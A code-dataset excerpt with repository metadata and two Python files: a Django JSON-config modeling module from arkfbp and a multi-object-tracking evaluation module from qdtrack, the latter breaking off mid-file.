hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a293bc85fbe0b61da927f2d847d68ea87390d5f8 | 21,670 | py | Python | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 2 | 2020-09-11T09:26:43.000Z | 2020-12-17T07:32:38.000Z | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 4 | 2020-12-02T03:42:38.000Z | 2020-12-14T07:56:06.000Z | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 2 | 2020-12-08T01:11:54.000Z | 2021-01-25T04:29:15.000Z | """
Automation project: JSON Config modeling.
"""
# pylint: disable=too-many-lines
import copy
import os
import time
from importlib import import_module
from django.db import models
from arkfbp.executer import Executer
from arkfbp.node import (CharFieldNode, IntegerFieldNode, FloatFieldNode, ListSerializerNode, AnyFieldNode,
UUIDFieldNode, BooleanFieldNode, DateTimeFieldNode, ModelSerializerNode, SerializerNode,
PaginationNode)
from arkfbp.utils.util import get_class_from_path, json_load
# ModelSerializerNode metadata
_AUTO_MODEL_SERIALIZER_NODE_NAME = 'auto_model_serializer'
_AUTO_MODEL_SERIALIZER_NODE_KIND = 'auto_model_serializer'
class AutoModelSerializerNode(ModelSerializerNode, SerializerNode):
"""
Auto Model SerializerNode
"""
name = _AUTO_MODEL_SERIALIZER_NODE_NAME
kind = _AUTO_MODEL_SERIALIZER_NODE_KIND
# pylint: disable=too-many-locals, import-outside-toplevel, no-member,
# pylint: disable=broad-except, unused-argument, too-many-branches, too-many-statements
def handle(self, api_detail, model_mapping, *args, **kwargs):
"""
handle model.
"""
# pylint: disable=line-too-long
index_value = None
for key, value in api_detail.get(CONFIG_API_INDEX, {}).items():
path = value if isinstance(value, str) else value.get(FIELD_SRC)
index = path.split('.')[-1]
index_value = kwargs.get(key, None)
break
handler = api_detail.get(API_TYPE, None)
if handler == API_TYPE_MAPPING['create']:
results = {}
for model, fields in model_mapping.items():
self.model = model
# pylint: disable=consider-using-dict-comprehension
collect_data = dict([(field[1], self.validated_data.get(field[1])) for field in fields])
results[model] = self.create(**collect_data)
response = {}
for model, instance in results.items():
struct, config = single_model_response(model, api_detail[API_RESPONSE], self.flow.config)
node = get_serializer_node(struct, config, instance=instance)
response.update(**node.data)
return response
if handler == API_TYPE_MAPPING['delete'] and index_value is not None:
for key, value in api_detail[CONFIG_API_INDEX].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
try:
instance = self.get_object(**{index: index_value})
except Exception:
return self.flow.shutdown({'error': 'No object exists'}, response_status=400)
self.delete(instance)
return {'delete': 'success'}
if handler == API_TYPE_MAPPING['update'] and index_value is not None:
for key, value in api_detail[API_REQUEST].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
try:
instance = self.get_object(**{index: index_value})
except Exception:
return self.flow.shutdown({'error': 'No object exists'}, response_status=400)
self.update(instance, **self.validated_data)
return self.data
if handler == API_TYPE_MAPPING['retrieve']:
for key, value in api_detail[API_RESPONSE].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
pagination_config = api_detail.get('pagination')
pagination = pagination_config.get('enabled', False) if pagination_config else False
if pagination:
page_query_param = 'page'
page_size_query_param = 'page_size'
for key, detail in api_detail[API_REQUEST].items():
if detail == '.pagination.page':
page_query_param = key
if detail == '.pagination.page_size':
page_size_query_param = key
page = self.inputs.ds.pop(page_query_param, 1)
page_size = self.inputs.ds.pop(page_size_query_param, 20)
query_set = self.retrieve(**self.inputs.ds)
node = get_serializer_node(api_detail[API_RESPONSE], self.flow.config, instance=query_set)
if pagination:
count_param = pagination_config.get('count_param', 'count')
results_param = pagination_config.get('results_param', 'results')
next_param = pagination_config.get('next_param', 'next')
previous_param = pagination_config.get('previous_param', 'previous')
paginated_response = pagination_config.get('paginated_response')
if paginated_response:
paginated_response = get_class_from_path(paginated_response)
pagination_node = PaginationNode()
ret = Executer.start_node(pagination_node,
self.flow,
page_size=page_size,
page=page,
inputs=query_set,
request=self.inputs,
count_param=count_param,
results_param=results_param,
next_param=next_param,
previous_param=previous_param,
page_query_param=page_query_param,
page_size_query_param=page_size_query_param,
serializer_node=node,
paginated_response=paginated_response)
# apply the custom restructuring of the response data
ret = reset_response('pagination', ret, api_detail[API_RESPONSE], self.flow.config)
return ret
return node.data
if handler == API_TYPE_MAPPING['custom']:
handler_path = api_detail['flow']
clz = import_module(f'{handler_path}.main')
flow = clz.Main()
ret = Executer.start_flow(
flow,
self.inputs,
validated_data=self.validated_data,
)
return ret
raise Exception('Invalid SerializerCore handler!')
# JSON config master fields definition
CONFIG_NAME = 'name'
CONFIG_TYPE = 'type'
CONFIG_MODULE = 'module'
CONFIG_META = 'meta'
CONFIG_API = 'api'
CONFIG_API_INDEX = 'index'
CONFIG_PERMISSION = 'permission'
# field source definition
SOURCE_MODEL = 'model'
SOURCE_META = 'meta'
SOURCE_INTERNAL = 'internal'
# field config definition
OBJECT_TYPE = 'object'
ARRAY_TYPE = 'array'
ARRAY_TYPE_ITEM = 'array_item'
FIELD_TYPE = 'type'
FIELD_TITLE = 'title'
FIELD_SRC = 'src'
FIELD_REQUIRED = 'required'
# api config definition
API_TYPE = 'type'
API_REQUEST = 'request'
API_RESPONSE = 'response'
API_PERMISSION = 'permission'
API_DEBUG = 'debug'
# extend for internal field
EXTEND_PAGINATION = 'pagination'
# role config field
ROLE_FLOW = 'flow'
# types of meta fields
META_FIELD_MAPPING = {
'string': CharFieldNode,
'integer': IntegerFieldNode,
'float': FloatFieldNode,
'object': AutoModelSerializerNode,
'array': ListSerializerNode,
'uuid': UUIDFieldNode,
'any': AnyFieldNode,
'boolean': BooleanFieldNode,
'datetime': DateTimeFieldNode,
}
# META_FIELD_MAPPING with keys and values swapped
REVERSE_META_FIELD_MAPPING = dict(zip(META_FIELD_MAPPING.values(), META_FIELD_MAPPING.keys()))
# default api handler types
API_TYPE_MAPPING = {
'create': 'create',
'delete': 'delete',
'update': 'update',
'retrieve': 'retrieve',
'custom': 'custom'
}
# model's fields <=> field nodes
MODEL_FIELD_MAPPING = {
models.AutoField:
IntegerFieldNode,
models.BigIntegerField:
IntegerFieldNode,
models.BooleanField:
BooleanFieldNode,
models.CharField:
CharFieldNode,
models.CommaSeparatedIntegerField:
CharFieldNode,
# models.DateField: DateFieldNode,
models.DateTimeField:
DateTimeFieldNode,
# models.DecimalField: DecimalFieldNode,
# models.EmailField: EmailFieldNode,
# models.Field: ModelFieldNode,
# models.FileField: FileFieldNode,
models.FloatField:
FloatFieldNode,
# models.ImageField: ImageFieldNode,
models.IntegerField:
IntegerFieldNode,
# models.NullBooleanField: NullBooleanFieldNode,
models.PositiveIntegerField:
IntegerFieldNode,
models.PositiveSmallIntegerField:
IntegerFieldNode,
# models.SlugField: SlugFieldNode,
models.SmallIntegerField:
IntegerFieldNode,
models.TextField:
CharFieldNode,
models.UUIDField:
UUIDFieldNode,
# models.TimeField: TimeFieldNode,
# models.URLField: URLFieldNode,
# models.GenericIPAddressField: IPAddressFieldNode,
# models.FilePathField: FilePathFieldNode,
}
# config...
def get_api_config(method: str, api_config: dict) -> (str, dict):
"""
get api config from meta config by request http method.
"""
api_detail = api_config.get(method.lower())
if not api_detail:
raise Exception(f'No api config for http_method:{method}!')
if CONFIG_API_INDEX in api_config.keys():
api_detail.update(index=api_config[CONFIG_API_INDEX])
return api_detail.get(CONFIG_TYPE, API_TYPE_MAPPING['custom']), api_detail
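# Illustrative call, with the config shape inferred from the accessors above
# (an assumption, not taken from any documentation):
#   api_config = {'get': {'type': 'retrieve', 'request': {}, 'response': {}},
#                 'index': {'id': 'user.id'}}
#   get_api_config('GET', api_config)
#   -> ('retrieve', {'type': 'retrieve', 'request': {}, 'response': {},
#                    'index': {'id': 'user.id'}})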
# pylint: disable=no-else-return, protected-access, too-many-nested-blocks
def import_field_config(field_name: str, field_detail: str, config: dict) -> (str, str, dict, dict):
"""
import from the local meta config, another meta config, or a model class.
return <field source, field path, field config detail, full meta config>.
"""
_field_detail = {}
if isinstance(field_detail, str):
path = field_detail
if isinstance(field_detail, dict):
_field_detail = copy.deepcopy(field_detail)
path = _field_detail.pop(FIELD_SRC, field_name)
# internally extended attribute, belonging to neither meta nor model
if path.startswith('.'):
return SOURCE_INTERNAL, path, {}, config
# _path => ['user', 'username'] or ['username']
_path = path.split('.')
if len(_path) == 1:
# {"meta": {"user": {"title":"","type":{}}}}
# _field_name => user
# field_config => {"title":"","type":{}}
_field_name = _path[0]
field_config = config[CONFIG_META][_field_name]
return SOURCE_META, _field_name, field_config, config
else:
# {"user": {"model": "models.user.User"}}
# name => user
# detail => {"model": "models.user.User"}
for name, detail in config[CONFIG_MODULE].items():
if name == _path[0]:
_field_name = _path[1]
if SOURCE_MODEL in detail.keys():
cls = get_class_from_path(detail[SOURCE_MODEL])
for item in cls._meta.fields:
if _field_name == item.name:
field_type = MODEL_FIELD_MAPPING[item.__class__]
field_config = {
FIELD_TITLE: item.verbose_name,
FIELD_TYPE: {
REVERSE_META_FIELD_MAPPING[field_type]: {}
},
**_field_detail
}
return SOURCE_MODEL, detail[SOURCE_MODEL], field_config, config
if SOURCE_META in detail.keys():
file_path = os.getcwd()
for item in detail[SOURCE_META].split('.'):
file_path = os.path.join(file_path, item)
file_path = f'{file_path}.json'
meta_config = json_load(file_path)
return SOURCE_META, detail[SOURCE_META], meta_config[SOURCE_META][_field_name], meta_config
raise Exception({'error': f'Path:{path} Config Does Not Exist!'})
def get_permission(permissions: list, config: dict) -> list:
"""
get permission from api permission field.
permissions => ["admin"]
"""
permission_config = config.get(CONFIG_PERMISSION)
flows = []
for item in permissions:
meta_permission = json_load(
os.path.join(os.getcwd(), f'{"/".join(permission_config[item.split(".")[0]].split("."))}.json'))
flows.append(get_class_from_path(f'{meta_permission[item.split(".")[1]][ROLE_FLOW]}.main.Main'))
return flows
# pylint: disable=protected-access
def merge_meta(meta: dict) -> dict:
"""
merge the module meta/model configs into a single meta config dict for the api.
"""
modules = meta.pop(CONFIG_MODULE)
_meta = {meta.pop(CONFIG_NAME): meta}
for meta_name, detail in modules.items():
if SOURCE_META in detail.keys():
# meta config
file_path = os.getcwd()
for item in detail[SOURCE_META].split('.'):
file_path = os.path.join(file_path, item)
file_path = f'{file_path}.json'
slave_meta = json_load(file_path)
module_meta = merge_meta(slave_meta)
_meta.update(**module_meta)
if SOURCE_MODEL in detail.keys():
# model config
module_model = {meta_name: {CONFIG_TYPE: "", CONFIG_META: {}, CONFIG_API: {}}}
# module_model = {"name": meta_name, "type": "", "meta": {}, "api": {}}
cls = get_class_from_path(detail[SOURCE_MODEL])
for item in cls._meta.fields:
field_type = MODEL_FIELD_MAPPING[item.__class__]
field_config = {
FIELD_TITLE: item.verbose_name,
FIELD_TYPE: {
REVERSE_META_FIELD_MAPPING[field_type]: {}
}
}
module_model[meta_name][SOURCE_META].update(**{item.name: field_config})
_meta.update(**module_model)
return _meta
# serializer...
# pylint: disable=too-many-locals
def get_serializer_node(show_fields: dict,
config: dict,
serializer_handler=AutoModelSerializerNode,
instance=None) -> object:
"""
Dynamically generate a serializer node from the field nodes
declared in the request/response config.
api_detail and config are not necessarily in the same file,
because model_object fields may reference other configs.
"""
cls_name = 'Serializer_%s' % str(time.time()).replace(".", "")
cls_attr = {}
for field, detail in show_fields.items():
# {"username":{"src":"user.username"}}
# field => username
# detail -> {"src":"user.username"}
source, _, field_config, meta_config = import_field_config(field, detail, config)
if source == SOURCE_INTERNAL:
continue
if source == SOURCE_META and OBJECT_TYPE in field_config[FIELD_TYPE].keys():
node = get_serializer_node(field_config[FIELD_TYPE][OBJECT_TYPE],
meta_config,
serializer_handler=AutoModelSerializerNode,
instance=instance)
cls_attr.update({field: node})
continue
if source == SOURCE_META and ARRAY_TYPE in field_config[FIELD_TYPE].keys():
child_node = get_serializer_node({'item': field_config[FIELD_TYPE][ARRAY_TYPE][ARRAY_TYPE_ITEM]},
meta_config,
instance=instance)
node = ListSerializerNode(child=child_node, instance=instance)
cls_attr.update({field: node})
continue
if source == SOURCE_MODEL:
source_name = detail.split('.')[-1] if isinstance(detail, str) else detail[FIELD_SRC].split('.')[-1]
source_name = None if source_name == field else source_name
cls_attr.update({field: get_field_node(field_config, config, source=source_name)})
continue
cls_attr.update({'show_fields': show_fields, 'config': config})
_cls = type(cls_name, (serializer_handler, ), cls_attr)
return _cls(instance=instance)
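# Note on the dynamic class above: for e.g. show_fields =
# {'username': 'user.username'} this builds a one-off Serializer_<timestamp>
# subclass of serializer_handler via type(), whose class attributes are the
# generated field nodes plus the 'show_fields' and 'config' dicts.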
def get_field_node(field_config: dict, config: dict, source=None) -> object:
"""
get field node.
"""
required = field_config.get(FIELD_REQUIRED, False)
field_type, field_attrs = tuple(field_config[FIELD_TYPE].items())[0][0], tuple(
field_config[FIELD_TYPE].items())[0][1]
if field_type == ARRAY_TYPE:
return get_serializer_node(field_attrs, config, serializer_handler=ListSerializerNode)
if field_type == OBJECT_TYPE:
return get_serializer_node(field_attrs, config, serializer_handler=AutoModelSerializerNode)
field_cls = META_FIELD_MAPPING[field_type]
field_attrs.update(required=required)
if source:
field_attrs.update(source=source)
return field_cls(**field_attrs)
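# Minimal sketch of the leaf case (field_config keys follow META_FIELD_MAPPING):
#   get_field_node({'type': {'string': {}}, 'required': True}, config)
#   -> CharFieldNode(required=True)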
def collect_model_mapping(fields: dict, config: dict) -> dict:
"""
fields => {"username":{"src":"model_user.username"}, "password":"password"}
return: {models.User: ['username', 'password'], models.Group: ['id']}
"""
model_mapping = {}
for field, detail in fields.items():
source, source_path, _, _ = import_field_config(field, detail, config)
if source == SOURCE_MODEL:
model_field = detail.split('.')[-1] if isinstance(detail, str) else detail[FIELD_SRC].split('.')[-1]
cls = get_class_from_path(source_path)
if cls not in model_mapping.keys():
# (field, field_name) => (show_field, model_field)
model_mapping[cls] = [(field, model_field)]
continue
model_mapping[cls].append((field, model_field))
return model_mapping
def search_available_model(field_name: str, field_detail: str, config: dict):
"""
field_name => username
field_detail => user or group.user
{field_name: field_detail}
"""
source, source_path, field_config, meta_config = import_field_config(field_name, field_detail, config)
if source == SOURCE_INTERNAL:
return None
if source == SOURCE_MODEL:
model = get_class_from_path(source_path)
return model
if OBJECT_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][OBJECT_TYPE].items():
model = search_available_model(key, value, meta_config)
if model:
return model
if ARRAY_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][ARRAY_TYPE].items():
return search_available_model(ARRAY_TYPE_ITEM, value, meta_config)
return None
def set_flow_debug(flow, api_detail):
"""
set flow debug from api_detail.debug
"""
flow.debug = api_detail.get(API_DEBUG, True)
# response...
def reset_response(extend: str, response: dict, show_fields: dict, config: dict) -> dict:
"""
reset response because of `.pagination` and so on.
"""
if extend == EXTEND_PAGINATION:
# response
# {"page": 1, "page_size": 30, "count": "", "results":{}, "next": "", "previous": ""}
for key, detail in show_fields.items():
# check whether extended pagination fields are present; if so, add them to ret and remove them from their original position
source, _, field_config, _ = import_field_config(key, detail, config)
if source == SOURCE_INTERNAL:
pass
if source == SOURCE_META:
if OBJECT_TYPE in field_config[FIELD_TYPE]:
for field, field_detail in field_config[FIELD_TYPE][OBJECT_TYPE].items():
if isinstance(field_detail, str) and field_detail.startswith(f'.{EXTEND_PAGINATION}'):
# rebuild the structure
# param => count or page or next or previous or results
param = field_detail.split('.')[-1]
response['results'][key].update(**{field: response[param]})
return response['results']
return response
def single_model_response(model: object, struct: dict, config: dict) -> (dict, dict):
"""
reset response struct for single model.
"""
_struct = {}
_config = copy.deepcopy(config)
for field, detail in struct.items():
source, source_path, field_config, config = import_field_config(field, detail, config)
if source == SOURCE_MODEL and source_path.split('.')[-1] == model.__name__:
_struct.update(**{field: detail})
if source == SOURCE_META and OBJECT_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][OBJECT_TYPE].items():
_source, _source_path, _, _ = import_field_config(key, value, config)
if _source == SOURCE_MODEL:
if _source_path.split('.')[-1] != model.__name__:
del _config[SOURCE_META][source_path][FIELD_TYPE][OBJECT_TYPE][key]
else:
_struct.update(**{field: detail})
if source == SOURCE_META and ARRAY_TYPE in field_config[FIELD_TYPE].keys():
# in the general case, an array does not appear in single_model_response
pass
return _struct, _config
| 39.257246 | 113 | 0.602077 | 2,323 | 21,670 | 5.349548 | 0.121825 | 0.032751 | 0.028325 | 0.024141 | 0.306027 | 0.257101 | 0.211073 | 0.182747 | 0.16601 | 0.162308 | 0 | 0.002095 | 0.29497 | 21,670 | 551 | 114 | 39.328494 | 0.811297 | 0.129811 | 0 | 0.264706 | 0 | 0 | 0.049841 | 0.011154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032086 | false | 0.005348 | 0.042781 | 0 | 0.157754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a294d061adc4aa59a6637bf412883b313644fac9 | 12,785 | py | Python | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | import time
from collections import defaultdict
import motmetrics as mm
import numpy as np
import pandas as pd
from motmetrics.lap import linear_sum_assignment
from motmetrics.math_util import quiet_divide
# note that there is no +1
def xyxy2xywh(bbox):
return [
bbox[0],
bbox[1],
bbox[2] - bbox[0],
bbox[3] - bbox[1],
]
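# e.g. xyxy2xywh([10, 20, 50, 80]) -> [10, 20, 40, 60]
# (corner coordinates to corner plus width/height; no +1, as noted above)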
# 1: person, 2: vehicle, 3: bike
super_category_map = {1: 1, 2: 1, 3: 2, 4: 2, 5: 2, 6: 3, 7: 3, 8: 2}
def intersection_over_area(preds, gts):
"""Returns the intersection over the area of the predicted box."""
out = np.zeros((len(preds), len(gts)))
for i, p in enumerate(preds):
for j, g in enumerate(gts):
x1, x2 = max(p[0], g[0]), min(p[0] + p[2], g[0] + g[2])
y1, y2 = max(p[1], g[1]), min(p[1] + p[3], g[1] + g[3])
out[i][j] = max(x2 - x1, 0) * max(y2 - y1, 0) / float(p[2] * p[3])
return out
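# Worked example: with pred p = [0, 0, 10, 10] and gt g = [5, 5, 10, 10] in
# xywh format, the overlap is the 5 x 5 square on [5, 10] x [5, 10], so
# out[0][0] = 25 / float(10 * 10) = 0.25.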
def preprocessResult(res, anns, cats_mapping, crowd_ioa_thr=0.5):
"""Preprocesses data for utils.CLEAR_MOT_M. In particular, we drop predictions that
have high iou with gt bboxes that shouldn't be counted, such as 'iscrowd' ones.
Modifies `res` in place by deleting the dropped predictions.
"""
# pylint: disable=too-many-locals
# fast indexing
# maps image_id -> category_id -> annotations that have this category id and occur in that img
annsByAttr = defaultdict(lambda: defaultdict(list))
for i, bbox in enumerate(anns['annotations']):
annsByAttr[bbox['image_id']][cats_mapping[bbox['category_id']]].append(
i)
dropped_gt_ids = set()
dropped_gts = []
print('Results before drop:', sum([len(i) for i in res]))
# match
for (r, img) in zip(res, anns['images']):
anns_in_frame = [
anns['annotations'][i] for v in annsByAttr[img['id']].values()
for i in v
]
gt_bboxes = [a['bbox'] for a in anns_in_frame if not a['iscrowd']]
res_bboxes = [xyxy2xywh(v['bbox'][:-1]) for v in r.values()]
res_ids = list(r.keys())
dropped_pred = []
# drop preds that match with ignored labels
dist = mm.distances.iou_matrix(gt_bboxes, res_bboxes, max_iou=0.5)
le, ri = linear_sum_assignment(dist)
ignore_gt = [
a.get('ignore', False) for a in anns_in_frame if not a['iscrowd']
]
fp_ids = set(res_ids)
for i, j in zip(le, ri):
if not np.isfinite(dist[i, j]):
continue
fp_ids.remove(res_ids[j])
if ignore_gt[i]:
# remove from results
dropped_gt_ids.add(anns_in_frame[i]['id'])
dropped_pred.append(res_ids[j])
dropped_gts.append(i)
# drop fps that fall in crowd regions
crowd_gt_labels = [a['bbox'] for a in anns_in_frame if a['iscrowd']]
if len(crowd_gt_labels) > 0 and len(fp_ids) > 0:
ioas = np.max(
intersection_over_area(
[xyxy2xywh(r[k]['bbox'][:-1]) for k in fp_ids],
crowd_gt_labels),
axis=1)
for i, ioa in zip(fp_ids, ioas):
if ioa > crowd_ioa_thr:
dropped_pred.append(i)
for p in dropped_pred:
del r[p]
print('Results after drop:', sum([len(i) for i in res]))
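# Design note: the drop logic above matches predictions to gt boxes with the
# Hungarian algorithm (linear_sum_assignment) on an IoU distance matrix capped
# at max_iou=0.5; predictions matched to 'ignore' gts are removed, and the
# remaining unmatched predictions are removed when more than crowd_ioa_thr of
# their own area falls inside an 'iscrowd' region.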
def aggregate_eval_results(summary,
metrics,
cats,
mh,
generate_overall=True,
class_average=False):
if generate_overall and not class_average:
cats.append('OVERALL')
new_summary = pd.DataFrame(columns=metrics)
for cat in cats:
s = summary[summary.index.str.startswith(
str(cat))] if cat != 'OVERALL' else summary
res_sum = s.sum()
new_res = []
for metric in metrics:
if metric == 'mota':
res = 1. - quiet_divide(
res_sum['num_misses'] + res_sum['num_switches'] +
res_sum['num_false_positives'], res_sum['num_objects'])
elif metric == 'motp':
res = quiet_divide((s['motp'] * s['num_detections']).sum(),
res_sum['num_detections'])
elif metric == 'idf1':
res = quiet_divide(
2 * res_sum['idtp'],
res_sum['num_objects'] + res_sum['num_predictions'])
else:
res = res_sum[metric]
new_res.append(res)
new_summary.loc[cat] = new_res
new_summary['motp'] = (1 - new_summary['motp']) * 100
if generate_overall and class_average:
new_res = []
res_average = new_summary.fillna(0).mean()
res_sum = new_summary.sum()
for metric in metrics:
if metric in ['mota', 'motp', 'idf1']:
new_res.append(res_average[metric])
else:
new_res.append(res_sum[metric])
new_summary.loc['OVERALL'] = new_res
dtypes = [
'float' if m in ['mota', 'motp', 'idf1'] else 'int' for m in metrics
]
dtypes = {m: d for m, d in zip(metrics, dtypes)}
new_summary = new_summary.astype(dtypes)
strsummary = mm.io.render_summary(
new_summary,
formatters=mh.formatters,
namemap={
'mostly_tracked': 'MT',
'mostly_lost': 'ML',
'num_false_positives': 'FP',
'num_misses': 'FN',
'num_switches': 'IDs',
'mota': 'MOTA',
'motp': 'MOTP',
'idf1': 'IDF1'
})
print(strsummary)
return new_summary
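# Design note: instead of averaging per-sequence scores, the aggregation above
# re-derives MOTA, MOTP and IDF1 from the summed raw counts (misses, switches,
# false positives, detections, idtp), which is the usual CLEAR-MOT way to build
# an OVERALL row; with class_average=True the ratio metrics are averaged over
# classes instead.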
def eval_mot(anns, all_results, split_camera=False, class_average=False, ann_path=None):
print('Evaluating BDD Results...')
assert len(all_results) == len(anns['images'])
t = time.time()
cats_mapping = {k['id']: k['id'] for k in anns['categories']}
############################## filtering predictions and gts that should be ignored
preprocessResult(all_results, anns, cats_mapping)
anns['annotations'] = [
a for a in anns['annotations']
if not (a['iscrowd'] or a.get('ignore', False))
]
# only run if something was predicted, since the tao eval code breaks otherwise
# import pdb;pdb.set_trace()
if all_results:
tao_results = tao_evaluation(ann_path, anns, all_results)
results = {}
for k, v in tao_results.items():
k = [str(token) for token in k]
k = ''.join(k)
results[f'tao_val_{k}'] = v
return results
else:
return {}
# # fast indexing
# # maps image_id -> category_id -> annotations that have this category id and occurs in that img
# annsByAttr = defaultdict(lambda: defaultdict(list))
# for i, bbox in enumerate(anns['annotations']):
# annsByAttr[bbox['image_id']][cats_mapping[bbox['category_id']]].append(
# i)
#
# track_acc = defaultdict(lambda: defaultdict())
# global_instance_id = 0
# num_instances = 0
# cat_ids = np.unique(list(cats_mapping.values()))
# video_camera_mapping = dict()
# for cat_id in cat_ids:
# for video in anns['videos']:
# track_acc[cat_id][video['id']] = mm.MOTAccumulator(auto_id=True)
# if split_camera:
# video_camera_mapping[video['id']] = video['camera_id']
#
# for img, results in zip(anns['images'], all_results):
# img_id = img['id']
#
# if img['frame_id'] == 0:
# global_instance_id += num_instances
# if len(list(results.keys())) > 0:
# num_instances = max([int(k) for k in results.keys()]) + 1
#
# pred_bboxes, pred_ids = defaultdict(list), defaultdict(list)
# for instance_id, result in results.items():
# _bbox = xyxy2xywh(result['bbox'])
# _cat = cats_mapping[result['label'] + 1]
# pred_bboxes[_cat].append(_bbox)
# instance_id = int(instance_id) + global_instance_id
# pred_ids[_cat].append(instance_id)
